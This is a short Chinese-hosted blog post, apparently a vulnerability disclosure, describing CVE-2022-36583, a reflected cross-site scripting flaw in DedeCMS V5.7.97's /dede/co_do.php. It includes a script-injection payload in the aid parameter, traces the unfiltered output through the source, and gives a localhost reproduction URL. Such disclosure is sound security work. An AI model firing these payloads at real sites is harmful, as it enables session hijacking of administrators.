Headline
CVE-2022-36583: Dedecms V5.7.97 contain an XSS vulnerability_1erkeU的博客-CSDN博客
DedeCMS V5.7.97 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities at /dede/co_do.php via the dopost, rpok, and aid parameters.
Dedecms V5.7.97 contain an XSS vulnerability
1erkeU 于 2022-07-19 22:44:33 发布 551 收藏
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
DedeCMS V5.7.97 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component /dede/co_do.php via the dopost, rpok, aidparameters.****Abstract
- Affected product: DedeCMS V5.7.97
- Attack type: Remote
- Affected component: /dede/co_do.php
- payload: dopost=replace&rpok=1&aid=’><scrIpt>alert(1)</script>\
Detail
/dede/co_ do.php line 156, the $aid variable in the ShowMsg() function is controllable. The $aid variable is obtained from $_GET[‘aid’].
/include/common.func.php line 280, the $aid variable is a $gourl variable in the ShowMsg() function.
/include/common.func.php line 326 and line 321, $gourl variables are spliced into $msg variables and output without filtering.
Recurrence
http://127.0.0.1/dede/co_do.php?dopost=replace&rpok=1&aid=%27%3E%3CscrIpt%3Ealert(666)%3C/script%3E